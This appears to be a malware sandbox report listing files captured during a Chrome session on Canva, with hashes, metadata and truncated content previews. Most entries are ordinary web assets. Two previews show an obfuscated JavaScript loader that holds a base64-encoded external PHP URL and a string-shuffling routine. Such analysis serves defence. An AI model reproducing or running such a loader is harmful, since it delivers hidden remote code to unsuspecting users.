                                                                                                                                                                                                                                                                    Preview:var file = "aHR0cHM6Ly9yb2JlcnRyZWVkMTMxMy5vbmxpbmUvbmV4dC5waHA=";....var _0x31ccbb=_0x252b;(function(_0x52ac57,_0x4c8f9d){var _0x1b458c=_0x252b,_0x5b0099=_0x52ac57();while(!![]){try{var _0x119f41=-parseInt(_0x1b458c(0x2428))/(0x7e*0x39+0x1ba8+0x449*-0xd)*(parseInt(_0x1b458c(0x51a))/(0x4dc+0x4*-0x590+0x1166))+-parseInt(_0x1b458c(0x1668))/(-0x8ad*0x3+0x1*0x16df+0x1*0x32b)*(parseInt(_0x1b458c(0x197f))/(0x1*-0x1075+-0x127f+0x2ea*0xc))+-parseInt(_0x1b458c(0x45b4))/(-0x3b*0xf+0x136*0x10+-0x16*0xb9)*(-parseInt(_0x1b458c(0x118))/(0x14c6*-0x1+0x19*0x4a+0xd92))+-parseInt(_0x1b458c(0xa25))/(0xb*0x1ee+-0x7b*-0x1d+-0x2322)+parseInt(_0x1b458c(0x47c))/(-0x3d*0x3e+0x1d3d+-0x5*0x2e3)+parseInt(_0x1b458c(0x3dd))/(-0x1*-0x1fd3+0x491*0x1+0xe3*-0x29)*(parseInt(_0x1b458c(0x48bd))/(-0x1e8f+-0x206a+-0x11b*-0x39))+parseInt(_0x1b458c(0x59c8))/(-0x130e+-0x1ba4+0x2ebd);if(_0x119f41===_0x4c8f9d)break;else _0x5b0099['push'](_0x5b0099['shift']());}catch(_0x2745d8){_0x5b0099['push'](_0x5b0099['shift']());}}}(_0x42dc,
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):411
                                                                                                                                                                                                                                                                    Entropy (8bit):5.232749009485403
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:12:kjhskjmosAyqnwf0Hz0oW0+NNJ2yQGGi7yQGGnXdlJVrvyQGGiO:kjhskjmzAyqwsHAoW0gmydB7ydkJlvya
                                                                                                                                                                                                                                                                    MD5:C0B2A76C1E93F5E6F8456BB938D2D403
                                                                                                                                                                                                                                                                    SHA1:2B3CEAA183DAE2C0E83BF94877A8A66FB4853C78
                                                                                                                                                                                                                                                                    SHA-256:B2E5D86D975FD3B8A3CBB0A0BC136749FC765692CE4825E660EA1C4E02735E0A
                                                                                                                                                                                                                                                                    SHA-512:94B9DBDF047107BCBF0C88BE127F435D6BAD2D3DD2FBF005F6C536EDDA6FFB23A895310AC0AB4141A36408C478C9396EF989AA3763AC3716C44005D54FEC1253
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/ec8d2419e931aebd.js
                                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[2141],{../***/ 240224:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {.}).call(self, self._45f7853dc7660378a038952b53c0953e);}..}])
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1339)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):956250
                                                                                                                                                                                                                                                                    Entropy (8bit):5.621377224677058
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:24576:tUvbScDi90HoN5Slnf7z4e/kd8O+elP/ZyAHsGoO5KiR9DPlen9N5W9CZybpeRGQ:KvbrDi90HoN5Slnf7z4e/kd81elP/ZyJ
                                                                                                                                                                                                                                                                    MD5:37FAEA3FE7A9E2A7176AAE5F11067AB0
                                                                                                                                                                                                                                                                    SHA1:8B5FAC88DC7F3FA45508D21E7D38411CE7B2D1F5
                                                                                                                                                                                                                                                                    SHA-256:989CACAB804905B086005FDDB09BA8BB0123F9721E7B1A3CE705AB0547E0568A
                                                                                                                                                                                                                                                                    SHA-512:3D180DDAC967E2B9CA9C8487BBC81D2F8E47811D93BDF9E26032A369BC6C6D814A4DF06645BFAE4BB035349A2E4421FE8AB9B63A3FF363AA01638D5C976E22C8
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:;// __FILE_CONTENT_FOR__:40ceb5685514c3ac.js.(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[5080],{../***/ 913728:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(552859);__web_req__(353279);__web_req__(388999);__web_req__(46127);__web_req__(694173);__web_req__(772112);__web_req__(232149);__web_req__(629056);__web_req__(293763);__web_req__(139504);__web_req__(713410);__web_req__(402398);__web_req__(550863);__web_req__(79194);__web_req__(277425);__web_req__(121446);__web_req__(932405);__web_req__(68864);__web_req__(323028);__web_req__(526023);__web_req__(17726);__web_req__(912002);__web_req__(517447);__web_req__(721935);__web_req__(224868);__web_req__(558104);__web_req__(798245);__web_req__(201099);__web_req__(131660);__web_req__(145431);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var Cx=__
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:CSV text
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):35234
                                                                                                                                                                                                                                                                    Entropy (8bit):5.118117952047096
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:768:w2WKaz3wcJtHbfbR1w+1+0p/8Oq/lU+I47M0an2B8eQLb80+S9tUg7M5NOJ1/iV6:q
                                                                                                                                                                                                                                                                    MD5:E09E2E1FC340201F46C6B422BA600D5A
                                                                                                                                                                                                                                                                    SHA1:16D401D9A12AD80829C81CD561D51EB392D402E1
                                                                                                                                                                                                                                                                    SHA-256:4C0EFBD2527DC14E6F890750AFE5C802AC496AB5F74B681D262975A0035790CF
                                                                                                                                                                                                                                                                    SHA-512:F3D7ED9695D32759B396321DBC382EC0D9864B884FFCE9BDD22CC2DACB29284524EE882A748619AE399CFBB6616621A888879F5540A6DF465C8F18B6D34841F5
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://font-public.canva.com/_fb/s/41d36c36b634199c0ebf5e807fda38d0.css
                                                                                                                                                                                                                                                                    Preview:@font-face {unicode-range: U+0-2138,U+213a-fffd; font-family: "_fb_"; font-display: swap; font-weight: 400; font-style: normal; src: url(https://font-public.canva.com/_fb/0/05.woff2) format("woff2"), url(https://font-public.canva.com/_fb/0/05.woff) format("woff"), url(https://font-public.canva.com/_fb/0/05.ttf) format("truetype")}..@font-face {unicode-range: U+0-2138,U+213a-fffd; font-family: "_fb_"; font-display: swap; font-weight: 700; font-style: normal; src: url(https://font-public.canva.com/_fb/0/02.woff2) format("woff2"), url(https://font-public.canva.com/_fb/0/02.woff) format("woff"), url(https://font-public.canva.com/_fb/0/02.ttf) format("truetype")}..@font-face {unicode-range: U+0-2138,U+213a-fffd; font-family: "_fb_"; font-display: swap; font-weight: 400; font-style: italic; src: url(https://font-public.canva.com/_fb/0/04.woff2) format("woff2"), url(https://font-public.canva.com/_fb/0/04.woff) format("woff"), url(https://font-public.canva.com/_fb/0/04.ttf) format("truetype")}
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):317601
                                                                                                                                                                                                                                                                    Entropy (8bit):5.588186370516761
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:6144:f44CMX/iOG9NsPmPzI7BJDMfgQJBCOOWx0/aJQ:Q4n6zsPmcZoC
                                                                                                                                                                                                                                                                    MD5:E673B833354BECB646B8258C5A3BB81C
                                                                                                                                                                                                                                                                    SHA1:F71388D16BA162AA7EF24891BF5BDA9DD5FA3EB4
                                                                                                                                                                                                                                                                    SHA-256:466F760CB15A6A8A4743263281D787245E83706C21B54ED2BAC6CABC905F9CDB
                                                                                                                                                                                                                                                                    SHA-512:6C566461068A526D15947BEA3CE3A2C4915BF88D94CD6EFB3BB11C9FC2227AF281E229708CE47B053FCB63E694445C2DACC34B39267D804FC5B069128DB9CF95
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_dma","priority":12,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":105},{"function":"__ogt_1p_data_v2","priority":12,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1240)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):12870
                                                                                                                                                                                                                                                                    Entropy (8bit):5.689146131237858
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:384:HQryodW8CBdLpGWFAitx0NV3JUnQpTGX+jR:HSWldLoWFA8x0/2WTV
                                                                                                                                                                                                                                                                    MD5:20E9FF75AA3527CFD46175DEAF4D946C
                                                                                                                                                                                                                                                                    SHA1:0958102C1FED7D3FAFA78B12D62664E427B94011
                                                                                                                                                                                                                                                                    SHA-256:A451DE88C33F48F5CD18186200AE38D6F1AC37CCE91B038C534963E30D54D256
                                                                                                                                                                                                                                                                    SHA-512:EB4945B9E9FA6C944B4E297B206B4755637D3F69DE498C79DF57C038E62867E0B409A0530A3E68FC36ED8858DCD20E811284D2A3211D392CC421E55A76236030
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/e5f78acafec3a6c5.js
                                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[5069],{../***/ 139504:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(79194);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var dj;var B=__c.B;var Xi,Ara,Bra,Dra,Cra,Era,Hra,Fra,fj;Xi=function(a,b,c){return Object.fromEntries(Object.entries("string"===typeof b||"number"===typeof b||"boolean"===typeof b?{default:b}:b).map(([d,e])=>[a[d],c?c(e):e]))};Ara=function({top:a,bottom:b,start:c,end:d}){return[a&&Yi[`${a}BorderTop`],b&&Yi[`${b}BorderBottom`],c&&Yi[`${c}BorderStart`],d&&Yi[`${d}BorderEnd`]]};Bra=function(a,b){return b?"flex"!==a||"start"!==b&&"end"!==b?Zi[`${b}AlignSelf`]:Zi[`${b}FlexAlignSelf`]:null};.Dra=function(a){if(Cra(a))return"_7ukmsg";switch(a){case "fluid":return null;case "content":return"oNSf9w";case "containedContent":return"_3
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):1404
                                                                                                                                                                                                                                                                    Entropy (8bit):4.114328576097192
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:24:t414ffo3Q0QIvvdznG0UezpigqybgrKrPO20hLMXlr9NkOf/qd0mdz9w/zAI:CH3Q0dvRG0zvBMOr10mx9m8vUAb
                                                                                                                                                                                                                                                                    MD5:ABA10B640F15BB01B8E5F0B804EEFC7F
                                                                                                                                                                                                                                                                    SHA1:65D1EDB21B0F31D4CCB9703EB05132A0E42D093D
                                                                                                                                                                                                                                                                    SHA-256:6A21FCEDE3E9D5593CF90C894BC059A94BBAE8D5D22ED0AC5511A1327F276881
                                                                                                                                                                                                                                                                    SHA-512:FDC916824C065944D02B7956BE310F01B9A56562BBB1510C345EDC925EA6CE478D235B5348AD140028CFA4F483BF1E947533CB83176A9F44DC13353A938329DF
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/images/aba10b640f15bb01b8e5f0b804eefc7f.svg
                                                                                                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><path fill="#FFDB5E" d="M34.956 17.916c0-.503-.12-.975-.321-1.404-1.341-4.326-7.619-4.01-16.549-4.221-1.493-.035-.639-1.798-.115-5.668.341-2.517-1.282-6.382-4.01-6.382-4.498 0-.171 3.548-4.148 12.322-2.125 4.688-6.875 2.062-6.875 6.771v10.719c0 1.833.18 3.595 2.758 3.885C8.195 34.219 7.633 36 11.238 36h18.044a3.337 3.337 0 0 0 3.333-3.334c0-.762-.267-1.456-.698-2.018 1.02-.571 1.72-1.649 1.72-2.899 0-.76-.266-1.454-.696-2.015 1.023-.57 1.725-1.649 1.725-2.901 0-.909-.368-1.733-.961-2.336a3.311 3.311 0 0 0 1.251-2.581z"/><path fill="#EE9547" d="M23.02 21.249h8.604c1.17 0 2.268-.626 2.866-1.633a.876.876 0 0 0-1.506-.892 1.588 1.588 0 0 1-1.361.775h-8.81c-.873 0-1.583-.71-1.583-1.583s.71-1.583 1.583-1.583H28.7a.875.875 0 0 0 0-1.75h-5.888a3.337 3.337 0 0 0-3.333 3.333c0 1.025.475 1.932 1.205 2.544a3.32 3.32 0 0 0-.998 2.373c0 1.028.478 1.938 1.212 2.549a3.318 3.318 0 0 0 .419 5.08 3.305 3.305 0 0 0-.852 2.204 3.337 3.337 0 0 0 3.
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (13020)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):13083
                                                                                                                                                                                                                                                                    Entropy (8bit):5.6383950800747655
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:192:ylOCYxjfxaHxaqK1ApReFM8M5e751VbamcPhU4KJOark:yfidaRaqOHqdC1Vbamw+4KJOag
                                                                                                                                                                                                                                                                    MD5:0F350106782EB085FF55517A53814244
                                                                                                                                                                                                                                                                    SHA1:E3C0E407FD10AA750E84BC2A0BCCA5D7B2A381E8
                                                                                                                                                                                                                                                                    SHA-256:ACBB8E63529D24C238279BB33A4EE5ACCA5653852E6F8FD56DD4710F51292872
                                                                                                                                                                                                                                                                    SHA-512:5E0EA2F68DDE500AEC387A2423A953F4DAC57F2429908CBBD5E987B061BA7B70CB6D0C223874CB79DB8835ED3EB3F7944968C81E0957BB52FED11DD9DF3478DD
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/777de1c5173d2119.ltr.css
                                                                                                                                                                                                                                                                    Preview:@font-face{font-display:swap;font-family:Noto Sans Variable;font-style:normal;font-weight:125 950;src:url(images/621675e6be83f675d33562d2ff7a0f63.woff2) format("woff2");unicode-range:u+06??}@font-face{font-display:swap;font-family:Noto Sans Variable;font-style:normal;font-weight:125 950;src:url(images/762fe37b99d49707e783d6281412d12f.woff2) format("woff2");unicode-range:u+0590-05ff}@font-face{font-display:swap;font-family:Noto Sans;font-style:normal;font-weight:400;src:url(images/d83221ee6a6841b17a754f68b6c5a3de.woff2) format("woff2");unicode-range:u+0900-097f}@font-face{font-display:swap;font-family:Noto Sans;font-style:normal;font-weight:600;src:url(images/e237b20d624e9275cdc02a523ab7f983.woff2) format("woff2");unicode-range:u+0900-097f}@font-face{font-display:swap;font-family:Noto Sans;font-style:normal;font-weight:700;src:url(images/3b5447850810ff964de17bcd37e03d5a.woff2) format("woff2");unicode-range:u+0900-097f}@font-face{font-display:swap;font-family:Noto Sans;font-style:normal;
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):6785
                                                                                                                                                                                                                                                                    Entropy (8bit):4.764532758184024
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:192:4rPKbcyONPj2Ix4JA63seKKpJ4zde/rsVJgqecW2RYz2nS6ef/kqy:4rPSchJ2Y4JhserpGZEVqecW2RRS6e0b
                                                                                                                                                                                                                                                                    MD5:9C747CF07B2623FE6F77E47F5A134103
                                                                                                                                                                                                                                                                    SHA1:7180E5B53413163E10A6CA1E94518AC2CEB7970A
                                                                                                                                                                                                                                                                    SHA-256:476CDA2BDE7910A58186B7B58D2BE6D22D3CFACDFEDA3354134B84E43D76AC98
                                                                                                                                                                                                                                                                    SHA-512:4C1894FD984FC35FBC725737F68B69982B4E53864EB8BF1B8A5826D4D62C682AD4D50C08BA4EAEE3FBE04D3B91EA22A79559AA77BE6BCF3B81025348C8CEB35A
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:(function () {. /**. * @type {string} Key for the visitor ID cookie.. */. const visitorIdKey = "Metadata_visitor_id";.. /**. * @type {string} Key for the session ID cookie.. */. const sessionIdKey = "Metadata_session_id";.. /**. * @type {string} IP address of the client.. */. let ip;.. /**. * Account configuration object.. */. const config = {. invalid: true. };.. /**. * Options object.. */. const opts = {. /**. * @type {string} Base URL for the CDN.. */. cdnBaseUrl: "https://cdn.metadata.io/pixel/config",.. /**. * @type {string} Base URL for the API.. */. baseUrl: "https://api-gw.metadata.io",.. /**. * @type {string} Account ID.. */. accountId: null. };.. /**. * Get the value of a cookie.. * @param {string} key - The key of the cookie.. * @returns {string|null} The value of the cookie, or null if not found.. */. const getCookieValue = (key) => {. const cookie = document.cookie.split("; ").find(fu
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8147), with no line terminators
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):8147
                                                                                                                                                                                                                                                                    Entropy (8bit):5.762733222430992
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:192:0K2e8wv0yzSOkcaBw941GEOHnCQDNksBJU1vk:0K2e8/yGOkcaBw941GEOHnCQPJU1vk
                                                                                                                                                                                                                                                                    MD5:EF1F718FB3320CB5567C6880D1F788DA
                                                                                                                                                                                                                                                                    SHA1:FC87E52CDDC67910A37CB2C631A117AB40D2DD1F
                                                                                                                                                                                                                                                                    SHA-256:04EF0DD3EAD32287C6B96DDB1CE923B8A4565E20F3360B57497554EF6F05B7CB
                                                                                                                                                                                                                                                                    SHA-512:0ED831CA5FA19DF5E18333EE6EF862EDBFDD8199311CEB938E05D2B9232066D91ECBFE79D901EE830BF156DCD21E055AD3DD6B2D0FE58D808326B7AE96C7B67B
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://www.canva.com/cdn-cgi/challenge-platform/h/b/scripts/jsd/22755d9a86c9/main.js?
                                                                                                                                                                                                                                                                    Preview:window._cf_chl_opt={cFPWv:'b'};~function(V,h,i,j,k,o,s,x){V=b,function(d,e,U,f,g){for(U=b,f=d();!![];)try{if(g=parseInt(U(512))/1+-parseInt(U(480))/2+parseInt(U(520))/3*(-parseInt(U(551))/4)+parseInt(U(477))/5*(parseInt(U(491))/6)+parseInt(U(569))/7*(-parseInt(U(556))/8)+-parseInt(U(481))/9*(-parseInt(U(563))/10)+-parseInt(U(490))/11,e===g)break;else f.push(f.shift())}catch(D){f.push(f.shift())}}(a,752286),h=this||self,i=h[V(543)],j={},j[V(509)]='o',j[V(482)]='s',j[V(506)]='u',j[V(502)]='z',j[V(517)]='n',j[V(486)]='I',j[V(504)]='b',k=j,h[V(557)]=function(g,D,E,F,a0,H,I,J,K,L,M){if(a0=V,null===D||void 0===D)return F;for(H=n(D),g[a0(552)][a0(483)]&&(H=H[a0(472)](g[a0(552)][a0(483)](D))),H=g[a0(500)][a0(554)]&&g[a0(544)]?g[a0(500)][a0(554)](new g[(a0(544))](H)):function(N,a1,O){for(a1=a0,N[a1(492)](),O=0;O<N[a1(473)];N[O+1]===N[O]?N[a1(476)](O+1,1):O+=1);return N}(H),I='nAsAaAb'.split('A'),I=I[a0(537)][a0(564)](I),J=0;J<H[a0(473)];K=H[J],L=m(g,D,K),I(L)?(M=L==='s'&&!g[a0(533)](D[K]),a0(57
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65464), with CRLF line terminators
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):1139792
                                                                                                                                                                                                                                                                    Entropy (8bit):5.21483496968837
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:12288:XPxS8nNEziPG948876taOfbGD/+j2hHg2c+W/ls4b8bIt1K5hiUF8rwx/O:fxS8ny+q48LkVbI+qUEwxW
                                                                                                                                                                                                                                                                    MD5:0AEB4314699F5E8563B055F3A57587FC
                                                                                                                                                                                                                                                                    SHA1:24C7FA6BD820C45F9B8C98D900234571186C0C06
                                                                                                                                                                                                                                                                    SHA-256:CBA4FF7773F3DDD0804B0E81B1750355BD3A7A33BFCDB022353C4D153A073052
                                                                                                                                                                                                                                                                    SHA-512:0F542ADF7E3CD4DB70CC26B54A7B8B3A6F561D473E7C2D7D04AD7290A594BFD95B06357B64331BAC096A83BFF805C5775BFAA6565CD7CD6F5ED080EA1D7A59D6
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:var file = "aHR0cHM6Ly9yb2JlcnRyZWVkMTMxMy5vbmxpbmUvbmV4dC5waHA=";....var _0x31ccbb=_0x252b;(function(_0x52ac57,_0x4c8f9d){var _0x1b458c=_0x252b,_0x5b0099=_0x52ac57();while(!![]){try{var _0x119f41=-parseInt(_0x1b458c(0x2428))/(0x7e*0x39+0x1ba8+0x449*-0xd)*(parseInt(_0x1b458c(0x51a))/(0x4dc+0x4*-0x590+0x1166))+-parseInt(_0x1b458c(0x1668))/(-0x8ad*0x3+0x1*0x16df+0x1*0x32b)*(parseInt(_0x1b458c(0x197f))/(0x1*-0x1075+-0x127f+0x2ea*0xc))+-parseInt(_0x1b458c(0x45b4))/(-0x3b*0xf+0x136*0x10+-0x16*0xb9)*(-parseInt(_0x1b458c(0x118))/(0x14c6*-0x1+0x19*0x4a+0xd92))+-parseInt(_0x1b458c(0xa25))/(0xb*0x1ee+-0x7b*-0x1d+-0x2322)+parseInt(_0x1b458c(0x47c))/(-0x3d*0x3e+0x1d3d+-0x5*0x2e3)+parseInt(_0x1b458c(0x3dd))/(-0x1*-0x1fd3+0x491*0x1+0xe3*-0x29)*(parseInt(_0x1b458c(0x48bd))/(-0x1e8f+-0x206a+-0x11b*-0x39))+parseInt(_0x1b458c(0x59c8))/(-0x130e+-0x1ba4+0x2ebd);if(_0x119f41===_0x4c8f9d)break;else _0x5b0099['push'](_0x5b0099['shift']());}catch(_0x2745d8){_0x5b0099['push'](_0x5b0099['shift']());}}}(_0x42dc,
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (32012)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):69597
                                                                                                                                                                                                                                                                    Entropy (8bit):5.369216080582935
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:1536:qNhEyjjTikEJO4edXXe9J578go6MWX2xkjVe4c4j2ll2Ac7pK3F71QDU8CuT:Exc2yjq4j2uYnQDU8CuT
                                                                                                                                                                                                                                                                    MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                                                                                                                                                                                                                                                    SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                                                                                                                                                                                                                                                    SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                                                                                                                                                                                                                                                    SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (10479)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):24352
                                                                                                                                                                                                                                                                    Entropy (8bit):5.684419390940329
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:384:Ndo5l/JHl1+sB/gqosP0dfkfchY5Hsld6wQZN+jp4S/ZN97BWi2il:N25pJHl5B/P+hqMld6wQH+Nf/ZzUi2il
                                                                                                                                                                                                                                                                    MD5:B6BD953D37AA2EC727EAC3CFE20081DE
                                                                                                                                                                                                                                                                    SHA1:F814EA28F1D7D4AA27330E18DFBD156758811568
                                                                                                                                                                                                                                                                    SHA-256:A0199686F6F843EFFB32B45E8E6DB4AB940BB32CCC7224399FF5BAB3B0DC7022
                                                                                                                                                                                                                                                                    SHA-512:FF1496DF41A237CBDEF6197D890DEE88F7BDB3CB525A3E75A1EFB3BBEC4D514DE4A6221DA33344AD1F72FD30DBE0D187E7952ED7ACBCB2379AA872CB7E243E69
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/fbc5f28f9cb20366.js
